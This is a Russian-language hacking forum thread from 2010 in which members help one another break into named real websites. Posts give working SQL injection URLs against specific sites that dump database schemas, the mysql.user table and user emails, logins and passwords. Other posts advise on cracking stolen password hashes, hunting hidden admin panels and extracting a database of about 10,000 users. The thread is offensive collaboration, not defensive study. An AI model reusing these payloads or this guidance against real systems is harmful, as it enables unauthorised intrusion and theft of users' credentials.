Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    http://www.shopzooly.com/login.php
     
  2. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    кэп говорит что это форма авторизации юзеров, а не админов.
     
    1 person likes this.
  3. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Возможно и админа авторизует. Часто так бывает, знаю по опыту.
     
  4. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    верно кэп) это только юзеры , для админов есть отдельная админка (я это знаю на 100%).

    Но найти ее трудновато (( "robots.txt" нету(((
     
  5. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    просканил админфайндером и интеллитемпером - результата нет.
    вывод: админка в рандомной папке, на другом порту или ваще локальная.
     
  6. JohnnyBGoode

    JohnnyBGoode Member

    Joined:
    5 Oct 2010
    Messages:
    48
    Likes Received:
    11
    Reputations:
    5
    Есть SQL inj
    Определил названия таблиц,названия столбцов
    Есть в users два таких столбца : password и current_hash.
    В котором из них пароль хранится ? В password - MYSQL хэш (расшифровал его,но при авторизации ошибку выдает),в current_hash - md5
     
  7. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2JohnnyBGoode возможно кэпую, но данные из current_hash расшифровать не пробовал?
     
  8. JohnnyBGoode

    JohnnyBGoode Member

    Joined:
    5 Oct 2010
    Messages:
    48
    Likes Received:
    11
    Reputations:
    5
    пытался,положительного результата не достиг

    И если тот расшифрованный пароль зашифровать в md 5,то результаты не сходятся
     
  9. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    Ну тогда пробуй расшифровать current_hash сам неможеш выложи на ачат
     
  10. nimferus

    nimferus New Member

    Joined:
    2 Nov 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Всем добрый день. Все вопросы по Sql inj

    Первый вопрос, что делать если не могу найти таблицу пользователей, где то встречал уже этот же вопрос, но поиском найти не смог.
    На пример :
    Всё перебрал а такой таблицы найти не смог.
    Я подумал, что делаю что то не так, и решил посмотреть в теме Sql инъекции.
    Взял последний сайт. Убрал то что там было, и решил сделать сам всё с самого начала.

    Вот так перебрал до 50, результат - ничего не найдено
    Но, тут возникает вопрос, ведь tracy как то узнал
    вопрос как? растолкуйте пожалуйста этот момент.

    ==================================

    Последний вопрос, возможно самый тупой.
    У меня всё получилось, я узнал логин и пароль админа
    расшифровал хэш, НО я могу найти админку, поискав по форуму нашёл 1 скрипт и какой то софт, для автоматизации этого процесса, но прогнав этот сайт, всё равно ничего не нашёл. Возможно что то посоветуете?

    ===================================

    Ещё вспомнил
    Вот так, если поля логин и пассворд
    Но после такого запроса
    получаю
    Что я делаю не так?
     
    #15250 nimferus, 3 Nov 2010
    Last edited: 3 Nov 2010
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    https://forum.antichat.ru/thread98525.html

    хотья не факт..
     
    _________________________
  12. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Дальше терпения не хватило? Или ты думаешь, что всё заканчивается на 50-ой таблице? =\

    Таблица в другой бд

    http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+selECt+1,2,table_schema,4,5,database(),7,8,9+from+information_schema.columns+where+table_name='USER'+limit+1,100+--+

    Запрос к этой таблице в бд mysql

    http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,9+from+mysql.user+--+
     
    #15252 R1dex, 3 Nov 2010
    Last edited: 3 Nov 2010
  13. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    https://rdot.org/forum/showpost.php?p=3323&postcount=16
     
    #15253 h00lyshit!, 3 Nov 2010
    Last edited: 4 Nov 2010
  14. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    nimferus, смотри позицию последней table_column через метод тыка аля limit 1000,1 - false делим на 2 limit 500,1 - true значит больше 500 и меньше 1000, limit 750,1 - false.. ну ты понел.. когда знаем точное число запускаем цикл аля for(int i=0;i<700;i++) и в цикле дергаем table_schema table_name table_column, куда то пишем и дальше уже через ctrl+f ишем все что нас интересует (pass|password|login etc) . для этих целей под себя лучше всего свой велосипед смастерить если знаний хватит.
     
  15. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    Это что еще за изврат?!
    select count(*) from information_schema.columns
    И все!
     
    3 people like this.
  16. nimferus

    nimferus New Member

    Joined:
    2 Nov 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Всем спасибо, немного разобрался, пойду дальше пыхтеть)
     
  17. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    извините ступил.. вроде sql не первый год юзаю а в скуль не додумался такое ставить.. черт.
     
  18. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    есть 2 базы
    inform.schema
    data

    делаю такой запрос:
    http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users --

    пишет что не существует поля email

    http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users.data --

    и так
    http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from data.users --
    тоже самое

    Помогите разобраться с запросом, через тулзу по одному не вариант в базе 10k юзеров
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    попробуй unhex(hex()) , aes_encrypt
     
  20. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Как здесь можно помочь разобраться с запросом- если мы не знаем настоящую ссылку? Ведь насколько я помню доменная зона
    om обычно используется с приставкой net (net.om) покрайней мере по твоей ссылке зайти не могу и гугл домен sffaoss.om - незнает.....

    P.S. Или это только у меня ???
     
    #15260 Kusto, 3 Nov 2010
    Last edited: 3 Nov 2010
Thread Status:
Not open for further replies.